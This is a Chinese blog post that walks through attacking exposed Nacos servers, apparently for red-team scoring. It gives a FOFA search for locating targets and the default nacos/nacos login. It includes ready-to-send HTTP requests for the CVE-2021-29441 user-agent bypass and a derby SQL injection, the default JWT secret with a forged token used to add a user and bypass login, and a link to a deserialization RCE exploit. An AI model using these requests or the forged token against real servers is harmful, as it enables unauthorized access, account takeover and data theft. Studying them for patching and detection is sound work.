渗透测试--Nacos系统

最新推荐文章于 2024-07-02 18:01:07 发布
最新推荐文章于 2024-07-02 18:01:07 发布
阅读量2.4k 收藏 25
点赞数 18
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134615116
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:前言

nacos是指Name and Config Service,阿里为 SpringCloud 贡献了一个子项目,叫做 SpringCloud Alibaba,其中包括了微服务开发中的几个基础组件,Nacos 就是此项目中的一项技术。可以实现服务注册中心、分布式配置中心。针对微服务架构中的服务发现、配置管理、服务治理的综合型解决方案。Nacos在攻防实战中也是经常遇到,大多数布置是在内网,但是公网上也是有不少的,因为其存在多个漏洞,师傅们也是通过nacos拿下了不少分数。

二:空间测绘查询

fofa:
protocol="nacos(http)"
image.png
可以看到公网上还真不少
image.png
没接触过的师傅们发现搜出来会是上图这样的,WEB页面呢?nacos的web页面是要加上正确的路径才能访问的。一般是加上/nacos/路径就可以访问,即http://x.x.x.x/nacos/
image.png
当然也有为了安全考虑更换了默认路径的。这就要靠师傅们思路去寻找了。

三:Nacos默认密码

nacos系统默认账号密码为nacos/nacos,运气好的话还是可以遇到的。
image.png
image.png

四:Nacos未授权访问CVE-2021-29441

此漏洞原因是nacos在认证时会判断User-agent是否为”Nacos-Server”,如果是的话会不进行任何认证。
POC:

GET /nacos/v1/auth/users?pageNo=1&pageSize=99 HTTP/1.1
User-Agent: Nacos-Server
Host: x.x.x.x
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

image.png
可以得到所有用户以及加密后的密码。

五:SQL注入(CNVD-2020-67618)

nacos在derby端点存在SQL注入
select * from users
POC:

GET /nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73 HTTP/1.1
User-Agent: Nacos-Server
Host: x.x.x.x
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

image.png

六: Nacos权限绕过(QVD-2023-6271)

这个漏洞个人认为是最常见的一个,有一半以上的nacos系统都存在这个洞。而且利用简单,危害极大。漏洞产生原因是nacos系统采用了默认的JWT密钥,nacos的JWT默认key是SecretKey012345678901234567890123456789012345678901234567890123456789
我们使用默认key构造新的JWT,推荐https://jwt.io/网站
image.png

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q

即为默认nacos用户的一个JWT,有了JWT,那么一切身份认证都是虚无。在日常攻防中常用的就是添加用户、修改密码、登录绕过。
添加一个账号密码为test的用户

POST /nacos/v1/auth/users HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q
Content-type: application/x-www-form-urlencoded
User-Agent: Nacos-Server
Host: .x.x.x.x
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 27
Connection: close

username=test&password=test

image.png
或者直接用accessToken绕过登录

POST /nacos/v1/auth/users/login HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q
User-Agent: Nacos-Server
Host: x.x.x.x
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close

username=nacos&password=nacos

image.png
复制响应体,然后用任意账号密码登录,拦截返回包,然后替换返回包。
image.png
发包,就可以成功登录
image.png

七:Nacos 集群 Raft 反序列化漏洞 (CNVD-2023-45001)

源于 Nacos 集群处理部分 Jraft 请求时,未限制使用 hessian 进行反 。序列化,攻击者可以通过发送特制的请求触发该漏洞,最终执行任意远程代码。nacos2.*版本默认开启了危险端口7848,1.*没有,所以该漏洞主要使用于nacos2.*版本
这个洞至今还没有打成功过,放一个大佬的exp大家可以试试
image.png
https://github.com/c0olw/NacosRce/

芝士土包鼠
关注
  • 18
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【漏洞复现】Nacos Derby SQL注入漏洞
晚风不及你
04-28 703
Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。
修复nacos漏洞问题SQL注入CNVD-2020-67618、未授权访问CVE-2021-29441等
kaopuzong的博客
02-06 1394
修复nacos漏洞问题:漏洞1:SQL注入CNVD-2020-67618 漏洞2:未授权访问CVE-2021-29441 漏洞3:token.secret.key默认配置QVD-2023-6271 漏洞4:Jraft Hessian反序列化CNVD-2023-45001
Nacos系统历史CVE漏洞的复现分析与检测
道阻且长,行则将至。
02-07 2307
本文复现、分析、总结了 Nacos 近几年的历史 CVE 漏洞,可以看到大厂发布的开源系统并非“坚不可摧”,很多看似“合理”的业务需求会成为漏洞的发源地。作为开发或运维人员,在引入开源组件或系统到自身业务系统的时候,应该持续关注其是否爆出安全漏洞,并及时升级版本、修复漏洞。
Nacos漏洞总结复现
zzz6583zz的博客
05-16 885
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
20206月份sql注入学习总结
Elohim__的博客
07-02 575
Dnslog盲注: 攻击者首先提交注入语句select load_file(concat(’\\’,‘攻击语句’,.XXX.ceye.io\abc)),concat()把执行结果语句和XXX.ceye.io\abc进行拼接,构成一个新的域名,而mysql中的select load_file()可以发起请求,那么这一条带有数据库查询结果的域名就被提交到DNS服务器进行解析,DNS服务器上的Dnslog就可以得到SQL注入结果,注入语句中的ceye.io,是一个开放的Dnslog平台,我们可以从平台获取到有关c
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 1295
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
nacos+harbor组合的渗透测试
weixin_42877383的博客
11-26 4119
harbor 未授权访问 在搜索框搜索即可获得仓库信息(有点敏感就不贴东西了) Swagger-ui文档泄露 https://IP:端口/devcenter-api-2.0 接口未授权访问 使用Swagger-ui访问接口即可,总有未授权的 未授权新建管理员 注册账号,对注册信息进行抓包修改,在post数据后面添加”has_admin_role”:true 影响版本 Harbor 1.7.0版本至1.8.2版本 不受影响版 Harbor>= 1.7.6 Harbor>= 1.8.3 nac
gittrack_TrackRay:一个开源的微服务渗透测试框架
weixin_39559382的博客
02-06 264
原标题:TrackRay:一个开源的微服务渗透测试框架关于溯光溯光(TrackRay)是一个由Java语言编写的服务式插件化渗透测试框架,项目是一个WEB服务,提供了调用插件和扫描的接口,并且使用了 Websocket 技术实现命令行风格交互,启动后只需要通过浏览器即可使用,有着多数开源渗透测试框架不具备的特点。自更新 2.0 版本后,项目数据库采用嵌入式数据库hsqldb,使用 SpringBo...
sql注入漏洞详解
qq_39511050的博客
09-17 1010
sql注入漏洞详解
seata分布式事务注入nacos
qq_35059264的博客
08-06 380
勿以浮沙筑高台 Seata分布式事务 Seata和Nacos整合 Git地址:https://github.com/seata/seata 1.在Nacos中新增命名空间 2.下载Seata 下载地址:https://github.com/seata/seata/releases/tag/v1.4.2 3.修改配置文件 进入config目录下修改配置文件registry.conf为以下内容,主要是配置注册中心和配置中心都是我们的nacos,命名空间为我们注册的命名空间9ef06f4f-4ac5-4f2e
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。 Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
零基础+进阶系统渗透测试工程师+CTF网络安全大赛学习指南
公众号:乌云安全
07-03 3174
2022年渗透测试学习路线
Nacos系列之设置MySQL数据库存储
小狐狸和小兔子
08-20 2072
Nacos设置MySQL数据库存储 首先保证你有jdk8+的环境,mysql5.6.5+ 一、下载nacos服务包,解压,最新版本1.3.2,下载地址 https://github.com/alibaba/nacos/releases 二、在本地数据库中建立一个新的数据库,我这里名字叫nacos_config,执行解压包中的conf/nacos-mysql.sql文件 三、打开conf/application.properties,找到MySQL的相关设置,放开原有注释,修改部分配置即可 #******
SQL注入漏洞修复方案及代码审计
fengxioabai的博客
03-18 1043
⼀个成功的SQL注⼊攻击可以从 数据库中获取敏感 数据、修改数据库数据(插⼊/更新/删除)、执⾏数据库管理操作 (如关闭数据库管理系统)、恢 复存在于数据库⽂件系统中的指定⽂件 内容,在某些情况下能对操作系统发布命令。由于⽤户的输⼊,也是SQL语句的⼀部分,所以 攻击者可以利⽤这部分可以控制的内容,注⼊⾃⼰定义的语句,改变SQL语句 执⾏逻辑,让数据库执⾏任意⾃⼰需要 的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何⾃⼰需要的数据,利⽤数据库的⼀ 些特性,可以直接 获取数据库服务器的系统权限。
网络安全基础技术扫盲篇 — 常见web漏洞之SQL注入
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-01 537
如果你也想学习:黑客&网络安全的SQL攻防知识宝库在此藏,一键关注获宝藏是一种Web应用程序中的安全漏洞,它允许攻击者通过在用户输入中插入恶意的SQL代码,来执行非授权的数据库操作。具体来说,当应用程序将用户输入的数据直接拼接到SQL查询语句中而没有充分验证或转义时,攻击者可以利用这个漏洞来修改原本的查询意图,甚至获取、修改或删除数据库中的数据。SQL注入攻击的原理是用户输入的数据被当成SQL代码执行。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8309
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
自学黑客技术(网络安全
dexi1113的博客
06-24 2774
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
GB/T22239-2019信息安全技术网络安全等级保护基本要求笔记
最新发布
chaotiantian的博客
07-02 498
可基于可信根对边界设备的系统引导程序、系统程序、重要配置参数和边界防护应用程序等进行可信验证,并在检测到其可信性受到破坏后进行报警,并将验证结果形成审计记录送至安全管理中心。可基于可信根对通信设备的系统引导程序、系统程序、重要配置参数和通信应用程序等进行验证,并在检测到其可信性受到破坏后进行报警,并将验证结果形成审计记录送至安全管理中心。b)应通过系统管理员对系统的资源和运行进行配置、控制和管理,包括用户身份、系统资源配置、系统加载和启动、系统运行的异常处理、数据和设备的备份与恢复等。
web安全渗透测试十大常规项(一):web渗透测试之Fastjson反序列化
HACKONE的博客
06-29 180
FastJson有一个全局缓存机制:在解析json数据前会先加载相关配置,调用addBaseClassMappings()和loadClass()函数将一些基础类和第三方库存放到mappings中(mappings是ConcurrentMap类,所以我们在一次连接中传入两个键值a和b,之后在解析时,如果没有开启autotype,会从mappings或deserializers.findClass()函数中获取反序列化的对应类,如果有,则直接返回绕过了黑名单。,在经过黑白名单后,在加载类时会去掉前后的L和;
nacos配置中心的maven依赖名称是什么? A. spring-cloud-starter-alibaba-nacos-config B. spring-cloud-alibaba-nacos-config C. spring-cloud-starter-nacos-config D. spring-cloud-nacos-config
05-29
nacos配置中心的 Maven 依赖名称是 `spring-cloud-starter-alibaba-nacos-config`,选项 A 是正确的。 该依赖是 Spring Cloud Alibaba 中集成 Nacos 配置中心的 Starter,包含了 Nacos 配置中心的核心依赖和 Spring Cloud 配置的相关依赖。可以在 Spring Boot 项目的 pom.xml 文件中添加以下依赖来使用 Nacos 配置中心: ```xml <dependency> <groupId>com.alibaba.cloud</groupId> <artifactId>spring-cloud-starter-alibaba-nacos-config</artifactId> </dependency> ``` 添加该依赖后,可以在 Spring Boot 应用程序中使用 `@RefreshScope` 注解来实现动态刷新配置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值